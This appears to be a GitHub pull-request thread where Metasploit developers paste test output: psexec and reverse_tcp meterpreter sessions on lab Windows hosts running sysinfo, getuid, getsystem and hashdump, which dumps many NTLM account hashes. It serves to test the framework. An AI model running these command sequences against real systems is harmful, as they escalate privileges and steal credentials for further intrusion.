jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [*] Running 'hashdump' on meterpreter session 76 (10.5.134.102) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1001:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 77 (10.5.134.120) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1001:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 78 (10.5.134.147) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:034f2b5ffc5e7a78c6734d2ddd8c001f::: [*] Running 'hashdump' on meterpreter session 79 (10.5.134.168) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [*] Running 'hashdump' on meterpreter session 80 (10.5.134.169) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1003:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1001:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 81 (10.5.134.187) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: [*] Running 'hashdump' on meterpreter session 82 (10.5.134.200) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: anakin_skywalker:1010:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa::: artoo_detoo:1006:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4::: ben_kenobi:1008:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859::: boba_fett:1013:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9::: chewbacca:1016:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8::: c_three_pio:1007:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee::: darth_vader:1009:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: greedo:1015:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: han_solo:1005:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951::: jabba_hutt:1014:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76::: jarjar_binks:1011:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4::: kylo_ren:1017:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001::: lando_calrissian:1012:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f::: leia_organa:1003:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028::: luke_skywalker:1004:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a::: sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: msf6 exploit(windows/smb/psexec) > ```

bwatters-r7 commented 10 months ago

:green_circle: Windows 2003/2008 Server

``` msf6 exploit(windows/smb/psexec) > sessions -C sysinfo [*] Running 'sysinfo' on meterpreter session 92 (10.5.132.123) Computer : WIN2K3X86-R2-SP OS : Windows Server 2003 (5.2 Build 3790, Service Pack 2). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 96 (10.5.132.108) Computer : WIN-HPUFI9UFNA7 OS : Windows Server 2008 R2 (6.1 Build 7601, Service Pack 1). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 0 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 97 (10.5.132.123) Computer : WIN2K3X86-R2-SP OS : Windows Server 2003 (5.2 Build 3790, Service Pack 2). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 99 (10.5.132.142) Computer : WIN2K3X86-SP1 OS : Windows Server 2003 (5.2 Build 3790, Service Pack 1). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 100 (10.5.132.148) Computer : WIN-2008X64 OS : Windows Server 2008 (6.0 Build 6001, Service Pack 1). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 0 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 101 (10.5.132.150) Computer : WIN2K3X86-R2-SP OS : Windows Server 2003 (5.2 Build 3790, Service Pack 2). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 102 (10.5.132.151) Computer : WIN2K3X86-R2 OS : Windows Server 2003 (5.2 Build 3790, Service Pack 1). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 103 (10.5.132.152) Computer : WIN2K3X64-SP1 OS : Windows Server 2003 (5.2 Build 3790, Service Pack 1). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 104 (10.5.132.161) Computer : WIN2K3X86-SP1 OS : Windows Server 2003 (5.2 Build 3790, Service Pack 1). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows [*] Running 'sysinfo' on meterpreter session 105 (10.5.132.165) Computer : WIN2008X86-SP1 OS : Windows Server 2008 (6.0 Build 6001, Service Pack 1). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 0 Meterpreter : x86/windows msf6 exploit(windows/smb/psexec) > sessions -C getuid [*] Running 'getuid' on meterpreter session 92 (10.5.132.123) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 96 (10.5.132.108) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 97 (10.5.132.123) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 99 (10.5.132.142) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 100 (10.5.132.148) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 101 (10.5.132.150) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 102 (10.5.132.151) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 103 (10.5.132.152) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 104 (10.5.132.161) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 105 (10.5.132.165) Server username: NT AUTHORITY\SYSTEM msf6 exploit(windows/smb/psexec) > sessions -C getsystem [*] Running 'getsystem' on meterpreter session 92 (10.5.132.123) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 96 (10.5.132.108) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 97 (10.5.132.123) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 99 (10.5.132.142) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 100 (10.5.132.148) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 101 (10.5.132.150) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 102 (10.5.132.151) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 103 (10.5.132.152) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 104 (10.5.132.161) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 105 (10.5.132.165) [-] Already running as SYSTEM msf6 exploit(windows/smb/psexec) > sessions -C hashdump [*] Running 'hashdump' on meterpreter session 92 (10.5.132.123) Administrator:500:79cad4f26761891bd408e6b105741864:28c81ace30d1ccf5a8205506f782b73e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:82eaedbeecf4a6f6e1b1f57e3c1b451b::: [*] Running 'hashdump' on meterpreter session 96 (10.5.132.108) Administrator:500:aad3b435b51404eeaad3b435b51404ee:28c81ace30d1ccf5a8205506f782b73e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: msfuser:1000:aad3b435b51404eeaad3b435b51404ee:28c81ace30d1ccf5a8205506f782b73e::: [*] Running 'hashdump' on meterpreter session 97 (10.5.132.123) Administrator:500:79cad4f26761891bd408e6b105741864:28c81ace30d1ccf5a8205506f782b73e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:82eaedbeecf4a6f6e1b1f57e3c1b451b::: [*] Running 'hashdump' on meterpreter session 99 (10.5.132.142) Administrator:500:79cad4f26761891bd408e6b105741864:28c81ace30d1ccf5a8205506f782b73e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:f444651e81b599aa0c731d0890225ca8::: [*] Running 'hashdump' on meterpreter session 100 (10.5.132.148) Administrator:500:aad3b435b51404eeaad3b435b51404ee:28c81ace30d1ccf5a8205506f782b73e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: msfuser:1000:aad3b435b51404eeaad3b435b51404ee:28c81ace30d1ccf5a8205506f782b73e::: [*] Running 'hashdump' on meterpreter session 101 (10.5.132.150) Administrator:500:79cad4f26761891bd408e6b105741864:28c81ace30d1ccf5a8205506f782b73e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:82eaedbeecf4a6f6e1b1f57e3c1b451b::: [*] Running 'hashdump' on meterpreter session 102 (10.5.132.151) Administrator:500:79cad4f26761891bd408e6b105741864:28c81ace30d1ccf5a8205506f782b73e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:e2689e8bf8c708128fee5ff6c68e81c8::: [*] Running 'hashdump' on meterpreter session 103 (10.5.132.152) msf6 exploit(windows/smb/psexec) > sessions -C sysinfo [*] Running 'sysinfo' on meterpreter session 114 (10.5.132.108) Computer : WIN-HPUFI9UFNA7 OS : Windows Server 2008 R2 (6.1 Build 7601, Service Pack 1). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 0 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 115 (10.5.132.148) Computer : WIN-2008X64 OS : Windows Server 2008 (6.0 Build 6001, Service Pack 1). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 0 Meterpreter : x64/windows [*] Running 'sysinfo' on meterpreter session 116 (10.5.132.152) Computer : WIN2K3X64-SP1 OS : Windows Server 2003 (5.2 Build 3790, Service Pack 1). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 1 Meterpreter : x64/windows msf6 exploit(windows/smb/psexec) > sessions -C getuid [*] Running 'getuid' on meterpreter session 114 (10.5.132.108) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 115 (10.5.132.148) Server username: NT AUTHORITY\SYSTEM [*] Running 'getuid' on meterpreter session 116 (10.5.132.152) Server username: NT AUTHORITY\SYSTEM msf6 exploit(windows/smb/psexec) > sessions -C getsystem [*] Running 'getsystem' on meterpreter session 114 (10.5.132.108) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 115 (10.5.132.148) [-] Already running as SYSTEM [*] Running 'getsystem' on meterpreter session 116 (10.5.132.152) [-] Already running as SYSTEM msf6 exploit(windows/smb/psexec) > sessions -C hashdump [*] Running 'hashdump' on meterpreter session 114 (10.5.132.108) Administrator:500:aad3b435b51404eeaad3b435b51404ee:28c81ace30d1ccf5a8205506f782b73e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: msfuser:1000:aad3b435b51404eeaad3b435b51404ee:28c81ace30d1ccf5a8205506f782b73e::: [*] Running 'hashdump' on meterpreter session 115 (10.5.132.148) Administrator:500:aad3b435b51404eeaad3b435b51404ee:28c81ace30d1ccf5a8205506f782b73e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: msfuser:1000:aad3b435b51404eeaad3b435b51404ee:28c81ace30d1ccf5a8205506f782b73e::: [*] Running 'hashdump' on meterpreter session 116 (10.5.132.152) Administrator:500:79cad4f26761891bd408e6b105741864:28c81ace30d1ccf5a8205506f782b73e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:e20d6c6a6aeb6a020f4b33ad1caee0d2::: ```

bwatters-r7 commented 10 months ago

🟢 Windows XP SP3 x86

``` msf6 payload(windows/meterpreter/reverse_tcp) > sessions -l Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 117 meterpreter x86/windows A-122D033910404\msfuser @ A-122D033910404 10.5.135.201:4565 -> 10.5.132.197:1031 (10.5.132.1 97) msf6 payload(windows/meterpreter/reverse_tcp) > sessions -i -1 [*] Starting interaction with 117... meterpreter > sysinfo Computer : A-122D033910404 OS : Windows XP (5.1 Build 2600, Service Pack 3). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows meterpreter > getuid Server username: A-122D033910404\msfuser meterpreter > getsystem WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/elevator.x86.dll is being used ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:04aa1163e6a845447d38376c4d831208:e145bd315972bd12b6ce48406d1f200c::: msfuser:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:5aa6d3c1cf7a7c0d1049618cb3ed4cd8::: meterpreter > ```